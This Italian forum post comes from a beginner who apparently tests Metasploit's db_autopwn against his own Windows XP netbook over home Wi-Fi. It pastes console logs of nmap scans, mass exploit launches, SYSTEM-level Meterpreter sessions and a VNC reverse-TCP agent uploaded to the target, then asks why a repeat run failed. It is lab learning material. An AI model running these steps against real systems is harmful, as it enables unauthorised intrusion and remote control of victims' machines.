Ciao a tutti,
Sono finalmente riuscito a portare a buon fine un attacco usando la funzione autopwn di metasploit da un portatile con BT4 r2 verso un acer aspire one con windows XP S3, entrambi collegati wi-fi ad uno stesso access point.
Il problema è che ho tentato di ripetere l’attacco giorni dopo (dopo aver spento entrambi i computer) con le stesse (credo) identiche condizioni del giorno precedente (cambiavano solo gli Ip), ma l’attacco non è andato a buon fine.
Ora, lavorando nel campo della ricerca come biochimico all’università, sono abituato a pensare in maniera scientifica 
per cui, secondo il ben noto “metodo scientifico”,se faccio un esperimento il giorno X e ottengo determinati risultati, facendo lo stesso esperimento nel giorno Y, nelle stesse condizioni, mi aspetto di ottenere gli stessi risultati.
Evidentemente c’è qualcosa che non torna…. mi piacerebbe capire perché il secondo attacco, effettuato con gli stessi passaggi non ha funzionato.
Ho provato l’autopwn perché, essendo alle prime armi, non so ancora riconoscere ed interpretare le possibili vulnerabilità rilevate dalla scansione con nmap, né a maggior ragione so decidere quali exploit conviene usare contro tali vulnerabilità….
So che sarebbe buona regola riuscire prima a capire le vulnerabilità e decidere poi in base a quelle l’attacco da usare… ho cercato in rete, ma fino ad ora ho trovato solo alcuni esempi su vecchie vulnerabilità e relativi exploit, che nel mio caso non hanno mai funzionato.
Mi piacerebbe sapere se esiste una guida completa (e comprensibile al neofita ;-)) tipo
orta X, servizio Y: usare exploit: A, B, C.
La cosa più importante di tutte:
…mi piacerebbe ovviamente anche sapere se esiste un modo per capire quali exploit del mio autopwn hanno funzionato (si sono aperte ben 3 sessioni) e in che modo lo hanno fatto.
Posto qui, lo scenario e gli output di entrambi gli attacchi:
Attacker: samsung R450 con BT4 r2 connesso con Wi-Fi al mio Access Point.
Target: Acer Aspire One con Windows XP SP3 Firewall di XP DISATTIVATO connesso con Wi-Fi al mio AP.
primo attacco:
Code:
ATTACCO 1
msf > db_driver mysql
[*] Using database driver mysql
msf > db_connect root:toor@127.0.0.1/prova
msf > db_nmap 192.168.0.2 --osscan-guess -sV
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-03 19:36 UTC
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 0.33 seconds
msf > db_nmap 192.168.0.2 --osscan-guess -sV -Pn
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-03 19:37 UTC
[*] Nmap: Nmap scan report for 192.168.0.2
[*] Nmap: Host is up (0.046s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: MAC Address: 00:23:4E:2E:FC:C4 (Hon Hai Precision Ind. Co.)
[*] Nmap: Service Info: OS: Windows
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds
msf > db_hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.0.2 00:23:4E:2E:FC:C4 Unknown device
msf > db_autopwn -x -e -p -R great
[*] (1/101 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.2:2869...
[*] (2/101 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.0.2:2869...
[*] (3/101 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.0.2:139...
[*] (4/101 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.0.2:2869...
......snip.....
[*] (99/101 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.0.2:2869...
[*] (100/101 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.0.2:2869...
[*] (101/101 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.2:445...
[*] (101/101 [0 sessions]): Waiting on 28 launched modules to finish execution...
[*] (101/101 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (101/101 [0 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.0.3:34499 -> 192.168.0.2:32906) at Tue May 03 19:48:17 +0000 2011
[*] Meterpreter session 3 opened (192.168.0.3:39483 -> 192.168.0.2:9261) at Tue May 03 19:48:18 +0000 2011
[*] Meterpreter session 4 opened (192.168.0.3:32993 -> 192.168.0.2:27406) at Tue May 03 19:48:18 +0000 2011
[*] (101/101 [3 sessions]): Waiting on 8 launched modules to finish execution...
[*] (101/101 [3 sessions]): Waiting on 8 launched modules to finish execution...
.....snip.....
[*] (101/101 [3 sessions]): Waiting on 1 launched modules to finish execution...
[*] (101/101 [3 sessions]): Waiting on 0 launched modules to finish execution...
msf > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B 192.168.0.3:34499 -> 192.168.0.2:32906
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B 192.168.0.3:39483 -> 192.168.0.2:9261
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B 192.168.0.3:32993 -> 192.168.0.2:27406
msf > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
632 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
680 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
704 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??
....snip......
C:\WINDOWS\system32\wuauclt.exe
3396 cmd.exe x86 0 ACER-88B18F6E0B\stefano C:\WINDOWS\system32\cmd.exe
1132 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.3 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\DAlZOGPWel.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.3:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "acer-88b18f6e0b"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
ShmCleanup called
meterpreter > exit
secondo attacco:
Code:
ATTACCO 2
msf > db_driver mysql
[*] Using database driver mysql
msf > db_connect root:toor@127.0.0.1/prova1
msf > db_hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
msf > db_nmap 192.168.0.7 -sV --osscan-guess -Pn
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-05 11:53 UTC
[*] Nmap: Nmap scan report for 192.168.0.7
[*] Nmap: Host is up (0.41s latency)
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: MAC Address: 00:23:4E:2E:FC:C4 (Hon Hai Precision Ind. Co.)
[*] Nmap: Service Info: OS: Windows
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.78 seconds
msf > db_hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.0.7 00:23:4E:2E:FC:C4 Unknown device
msf > db_autopwn -x -e -p -R great
[*] (1/100 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.0.7:2869...
....snip....
[*] (100/100 [0 sessions]): Waiting on 0 launched modules to finish execution...
msf >
Grazie anticipatamente,
...please be patient (and exhaustive) with newbies!
due volte autopwn, stesse condizioni, due risultati diversi
Posting Permissions
